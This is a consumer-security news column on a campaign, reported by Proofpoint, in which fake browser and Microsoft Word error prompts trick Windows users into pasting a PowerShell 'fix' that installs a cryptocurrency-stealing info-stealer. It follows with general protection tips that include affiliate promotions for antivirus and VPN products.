Fake software fixes fuel money-stealing malware threat

Online protection firm Proofpoint warns that new and sophisticated malware that impersonates Google Chrome and Microsoft has the potential to steal money from Windows device owners. Multiple groups of cyber criminals are using this malware, including some known for sending spam emails that can infect computers with malware or ransomware.

The malware poses as fake updates in internet browsers like Chrome to trick users into downloading harmful code. Once the code is on the computer, the hackers can access cryptocurrencies, sensitive files, and personal information.

GET SECURITY ALERTS, EXPERT TIPS – SIGN UP FOR KURT’S NEWSLETTER – THE CYBERGUY REPORT HERE

Microsoft

 

How does the fake update malware work?

Proofpoint identified a larger distribution of the malware earlier this month, but the online protection firm believes the campaign has been ongoing since March 2024. The malware poses as fake Google Chrome, Word, and OneDrive errors to coerce users into downloading harmful code. These errors prompt the visitor to click a button to copy a PowerShell “fix” into the clipboard, then paste and run it in a Run dialog or PowerShell prompt.

“Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk,” warns ProofPoint.

When the PowerShell script runs, it checks if the device is a valid target. Then, it downloads more payloads. These steps include clearing the DNS cache, removing clipboard content, showing a fake message, and downloading another remote PowerShell script.

Proofpoint

 

BEST ANTIVIRUS FOR PCS, MACS, IPHONES AND ANDROIDS – CYBERGUY PICKS

 

Cryptocurrency theft

This second script checks if it’s running on a virtual machine before downloading an info-stealer. Once everything is ready, the hacker can access the victim’s cryptocurrency. This scheme redirects the victim’s funds to the hacker instead of the intended recipient.

 

Alternative attack method: Email lure

Proofpoint notes that bad actors also use another method called “email lure” to install harmful software. Emails, typically those that appear to be work- or corporate-related, contain an HTML file that resembles Microsoft Word. These emails prompt users to install the “Word Online” extension to view the document correctly.

Similar to the method above, users are prompted to open PowerShell and copy over malicious code. Proofpoint says the deceptive “campaign” is widespread. “The campaign included over 100,000 messages and targeted thousands of organizations globally,” according to the firm.

Proofpoint

 

DON’T LET SNOOPS NEARBY LISTEN TO YOUR VOICEMAIL WITH THIS QUICK TIP

 

5 ways to protect yourself from harmful software

The fake Chrome and Microsoft Word malware creates a sense of urgency, making users click on the links and unknowingly compromise their devices. There are several steps you can take to protect yourself from such malware.

1) Have strong antivirus software: The best way to protect yourself from clicking malicious links that install malware that may get access to your private information is to have antivirus protection installed on all your devices. This can also alert you of any phishing emails or ransomware scams.

My top pick is TotalAV, and you can get a limited-time deal for CyberGuy readers: $19 your first year (80% off) for the TotalAV Antivirus Pro package.  

Get my picks for the best 2024 antivirus protection winners for your Windows, Mac, Android & iOS devices.

Best Antivirus Protection 2024

2) Use a VPN: Consider using a VPN to protect against being tracked and to identify your potential location on websites that you visit.  Many sites can read your IP address and, depending on their privacy settings, may display the city from which you are corresponding. A VPN will disguise your IP address to show an alternate location.

My top recommendation is ExpressVPN. It has a quick and easy setup, is available in 105 countries, and will not log your IP address, browsing history, traffic destination or metadata, or DNS queries.

Right now, you can get 3 extra months FREE with a 12-month ExpressVPN plan. That’s just $6.67 per month, a savings of 49%! Try it risk-free for 30 days.

For best VPN software, see my expert review of the best VPNs for browsing the web privately on your Windows, Mac, Android & iOS devices

Best VPNs for browsing the web privately 2024

3) Monitor your accounts: Regularly review your bank statements, credit card statements, and other financial accounts for any unauthorized activity. If you notice any suspicious transactions, report them immediately to your bank or credit card company.

4) Place a fraud alert: Contact one of the three major credit reporting agencies (Equifax, Experian, or TransUnion) and request a fraud alert to be placed on your credit file. This will make it more difficult for identity thieves to open new accounts in your name without verification.

5) Enable two-factor authentication: Enable two-factor authentication whenever possible. This adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone, in addition to your password.

 

HOW TO REMOVE YOUR PRIVATE DATA FROM THE INTERNET

 

Kurt’s key takeaways

Hackers have cleverly designed malware that prompts you to install it on your devices. This malware specifically targets Windows users, and I’ve noticed that Windows devices seem to be more susceptible to these kinds of attacks. Recently, Microsoft admitted to a Wi-Fi driver flaw in Windows that allows hackers to hijack your PC simply by being on the same Wi-Fi network. It’s crucial to be cautious when browsing online or connecting to public Wi-Fi.

How do you verify the authenticity of software before downloading and installing it on your device? Let us know in the comments below.

FOR MORE OF MY SECURITY ALERTS, SUBSCRIBE TO MY FREE CYBERGUY REPORT NEWSLETTER HERE

 

 

Copyright 2024 CyberGuy.com.  All rights reserved.  CyberGuy.com articles and content may contain affiliate links that earn a commission when purchases are made.

Related posts

How your browser is spying on you. Hidden dangers lurking behind every click

T-Mobile hacked by Chinese cyber espionage in major attack on US telecoms

Must-do privacy settings on your iPhone in iOS 18.1